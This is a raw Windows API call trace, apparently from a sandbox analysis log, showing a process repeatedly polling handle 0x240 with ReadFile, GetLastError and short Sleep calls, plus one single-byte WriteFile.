	[0243.720] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.720] GetLastError () returned 0x218
	[0243.720] Sleep (dwMilliseconds=0xa) 
	[0243.738] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.738] GetLastError () returned 0x218
	[0243.738] Sleep (dwMilliseconds=0xa) 
	[0243.773] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.773] GetLastError () returned 0x218
	[0243.773] Sleep (dwMilliseconds=0xa) 
	[0243.813] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.813] GetLastError () returned 0x218
	[0243.813] Sleep (dwMilliseconds=0xa) 
	[0243.860] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.860] GetLastError () returned 0x218
	[0243.860] Sleep (dwMilliseconds=0xa) 
	[0243.920] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.920] GetLastError () returned 0x218
	[0243.920] Sleep (dwMilliseconds=0xa) 
	[0243.923] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.923] GetLastError () returned 0x218
	[0243.923] Sleep (dwMilliseconds=0xa) 
	[0243.941] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.941] GetLastError () returned 0x218
	[0243.941] Sleep (dwMilliseconds=0xa) 
	[0243.955] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.955] GetLastError () returned 0x218
	[0243.955] Sleep (dwMilliseconds=0xa) 
	[0243.971] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.971] GetLastError () returned 0x218
	[0243.971] Sleep (dwMilliseconds=0xa) 
	[0243.986] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.986] GetLastError () returned 0x218
	[0243.986] Sleep (dwMilliseconds=0xa) 
	[0244.032] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.032] GetLastError () returned 0x218
	[0244.032] Sleep (dwMilliseconds=0xa) 
	[0244.097] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.097] GetLastError () returned 0x218
	[0244.097] Sleep (dwMilliseconds=0xa) 
	[0244.141] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.141] GetLastError () returned 0x218
	[0244.141] Sleep (dwMilliseconds=0xa) 
	[0244.203] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.203] GetLastError () returned 0x218
	[0244.203] Sleep (dwMilliseconds=0xa) 
	[0244.219] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.220] GetLastError () returned 0x218
	[0244.220] Sleep (dwMilliseconds=0xa) 
	[0244.235] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.235] GetLastError () returned 0x218
	[0244.235] Sleep (dwMilliseconds=0xa) 
	[0244.251] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.251] GetLastError () returned 0x218
	[0244.251] Sleep (dwMilliseconds=0xa) 
	[0244.267] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.267] GetLastError () returned 0x218
	[0244.267] Sleep (dwMilliseconds=0xa) 
	[0244.283] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.283] GetLastError () returned 0x218
	[0244.283] Sleep (dwMilliseconds=0xa) 
	[0244.298] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.298] GetLastError () returned 0x218
	[0244.298] Sleep (dwMilliseconds=0xa) 
	[0244.314] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.314] GetLastError () returned 0x218
	[0244.314] Sleep (dwMilliseconds=0xa) 
	[0244.359] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.359] GetLastError () returned 0x218
	[0244.360] Sleep (dwMilliseconds=0xa) 
	[0244.406] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.407] GetLastError () returned 0x218
	[0244.407] Sleep (dwMilliseconds=0xa) 
	[0244.454] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.454] GetLastError () returned 0x218
	[0244.454] Sleep (dwMilliseconds=0xa) 
	[0244.469] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.469] GetLastError () returned 0x218
	[0244.469] Sleep (dwMilliseconds=0xa) 
	[0244.485] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.486] GetLastError () returned 0x218
	[0244.486] Sleep (dwMilliseconds=0xa) 
	[0244.547] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.547] GetLastError () returned 0x218
	[0244.547] Sleep (dwMilliseconds=0xa) 
	[0244.571] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.571] GetLastError () returned 0x218
	[0244.571] Sleep (dwMilliseconds=0xa) 
	[0244.609] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.609] GetLastError () returned 0x218
	[0244.609] Sleep (dwMilliseconds=0xa) 
	[0244.657] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.657] GetLastError () returned 0x218
	[0244.657] Sleep (dwMilliseconds=0xa) 
	[0244.702] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.702] GetLastError () returned 0x218
	[0244.702] Sleep (dwMilliseconds=0xa) 
	[0244.724] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.724] GetLastError () returned 0x218
	[0244.724] Sleep (dwMilliseconds=0xa) 
	[0244.734] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.734] GetLastError () returned 0x218
	[0244.734] Sleep (dwMilliseconds=0xa) 
	[0244.749] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.749] GetLastError () returned 0x218
	[0244.749] Sleep (dwMilliseconds=0xa) 
	[0244.765] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.765] GetLastError () returned 0x218
	[0244.765] Sleep (dwMilliseconds=0xa) 
	[0244.781] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.781] GetLastError () returned 0x218
	[0244.781] Sleep (dwMilliseconds=0xa) 
	[0244.797] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.797] GetLastError () returned 0x218
	[0244.797] Sleep (dwMilliseconds=0xa) 
	[0244.812] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.812] GetLastError () returned 0x218
	[0244.812] Sleep (dwMilliseconds=0xa) 
	[0244.828] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.828] GetLastError () returned 0x218
	[0244.828] Sleep (dwMilliseconds=0xa) 
	[0244.874] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.874] GetLastError () returned 0x218
	[0244.874] Sleep (dwMilliseconds=0xa) 
	[0244.921] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.921] GetLastError () returned 0x218
	[0244.921] Sleep (dwMilliseconds=0xa) 
	[0244.968] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.969] GetLastError () returned 0x218
	[0244.969] Sleep (dwMilliseconds=0xa) 
	[0244.984] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0244.984] GetLastError () returned 0x218
	[0244.984] Sleep (dwMilliseconds=0xa) 
	[0245.000] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0245.000] GetLastError () returned 0x218
	[0245.000] Sleep (dwMilliseconds=0xa) 
	[0245.047] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0245.047] GetLastError () returned 0x218
	[0245.047] Sleep (dwMilliseconds=0xa) 
	[0245.088] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0245.088] GetLastError () returned 0x218
	[0245.088] Sleep (dwMilliseconds=0xa) 
	[0245.125] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0245.125] GetLastError () returned 0x218
	[0245.125] Sleep (dwMilliseconds=0xa) 
	[0245.180] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0245.180] GetLastError () returned 0x218
	[0245.180] Sleep (dwMilliseconds=0xa) 
	[0245.218] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0245.218] GetLastError () returned 0x218
	[0245.218] Sleep (dwMilliseconds=0xa) 
	[0245.233] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0245.233] GetLastError () returned 0x218
	[0245.233] Sleep (dwMilliseconds=0xa) 
	[0245.250] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0245.250] GetLastError () returned 0x218
	[0245.250] Sleep (dwMilliseconds=0xa) 
	[0245.264] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0245.265] GetLastError () returned 0x218
	[0245.265] Sleep (dwMilliseconds=0xa) 
	[0245.281] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0245.281] GetLastError () returned 0x218
	[0245.281] Sleep (dwMilliseconds=0xa) 
	[0245.296] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0245.296] GetLastError () returned 0x218
	[0245.297] Sleep (dwMilliseconds=0xa) 
	[0245.313] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0245.313] GetLastError () returned 0x218
	[0245.313] Sleep (dwMilliseconds=0xa) 
	[0245.327] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0245.327] GetLastError () returned 0x218
	[0245.327] Sleep (dwMilliseconds=0xa) 
	[0245.342] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0245.342] GetLastError () returned 0x218
	[0245.342] Sleep (dwMilliseconds=0xa) 
	[0245.397] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0245.397] GetLastError () returned 0x218
	[0245.397] Sleep (dwMilliseconds=0xa) 
	[0245.437] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0245.437] GetLastError () returned 0x218
	[0245.438] Sleep (dwMilliseconds=0xa) 
	[0245.484] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0245.484] GetLastError () returned 0x218
	[0245.484] Sleep (dwMilliseconds=0xa) 
	[0245.508] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0245.508] GetLastError () returned 0x218
	[0245.508] Sleep (dwMilliseconds=0xa) 
	[0245.514] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0245.514] GetLastError () returned 0x218
	[0245.514] Sleep (dwMilliseconds=0xa) 
	[0245.531] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0245.531] GetLastError () returned 0x218
	[0245.531] Sleep (dwMilliseconds=0xa) 
	[0245.547] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0245.547] GetLastError () returned 0x218
	[0245.547] Sleep (dwMilliseconds=0xa) 
	[0245.561] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0245.561] GetLastError () returned 0x218
	[0245.561] Sleep (dwMilliseconds=0xa) 
	[0245.577] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0245.577] GetLastError () returned 0x218
	[0245.577] Sleep (dwMilliseconds=0xa) 
	[0245.592] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0245.592] GetLastError () returned 0x218
	[0245.592] Sleep (dwMilliseconds=0xa) 
	[0245.638] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0245.638] GetLastError () returned 0x218
	[0245.638] Sleep (dwMilliseconds=0xa) 
	[0245.685] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0245.685] GetLastError () returned 0x218
	[0245.685] Sleep (dwMilliseconds=0xa) 
	[0245.763] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0245.763] GetLastError () returned 0x218
	[0245.763] Sleep (dwMilliseconds=0xa) 
	[0245.794] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0245.794] GetLastError () returned 0x218
	[0245.794] Sleep (dwMilliseconds=0x3e8) 
	[0246.824] WriteFile (in: hFile=0x240, lpBuffer=0x108f208, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0) returned 0
	[0246.824] Sleep (dwMilliseconds=0xa) 
	[0246.840] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0246.840] GetLastError () returned 0x218
	[0246.840] Sleep (dwMilliseconds=0xa) 
	[0246.855] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0246.855] GetLastError () returned 0x218
	[0246.856] Sleep (dwMilliseconds=0xa) 
	[0246.872] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0246.872] GetLastError () returned 0x218
	[0246.872] Sleep (dwMilliseconds=0xa) 
	[0246.886] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0246.886] GetLastError () returned 0x218
	[0246.886] Sleep (dwMilliseconds=0xa) 
	[0246.904] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0246.904] GetLastError () returned 0x218
	[0246.904] Sleep (dwMilliseconds=0xa) 
	[0246.917] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0246.917] GetLastError () returned 0x218
	[0246.949] Sleep (dwMilliseconds=0xa) 
	[0246.998] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0246.999] GetLastError () returned 0x218
